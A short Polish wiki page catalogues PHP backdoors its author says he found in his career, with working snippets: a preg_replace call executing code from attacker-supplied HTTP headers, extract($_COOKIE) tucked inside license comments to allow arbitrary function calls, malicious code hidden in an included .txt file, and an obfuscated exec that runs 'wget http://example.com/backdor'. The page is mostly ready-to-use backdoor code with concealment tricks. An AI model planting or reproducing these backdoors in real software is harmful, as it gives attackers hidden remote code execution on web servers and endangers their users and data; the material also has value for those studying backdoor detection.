User Tools

Site Tools


php

Backdory

Ciekawsze backdory jakie znalazłem w swojej “karierze”.

preg_replace zamiast eval
<?php @preg_replace($_SERVER['HTTP_X_TAJNE'], $_SERVER['HTTP_X_WYRAZENIE_PHP'], ''); ?>
extract ciastek
<?php 
/* tresc licencji */extract($_COOKIE);/*
   dalsza treść licencji */@$TAJNE&&@$F($A,$B);/*
   dalsza treść licencji
*/

Ukrywanie backdorów

include
<?php
# to jest plik foo.txt
echo 'jestem zlosliwym kodem'
<?php
include 'foo.txt';

A w foo.txt może być inny backdor, np extract ciastek. Szukanie tego może być trudne.

exec
$y = implode('', array('e','x','e','c'));
$y('wget http://example.com/backdor');
php.txt · Last modified: 2015/09/10 09:26 by dominik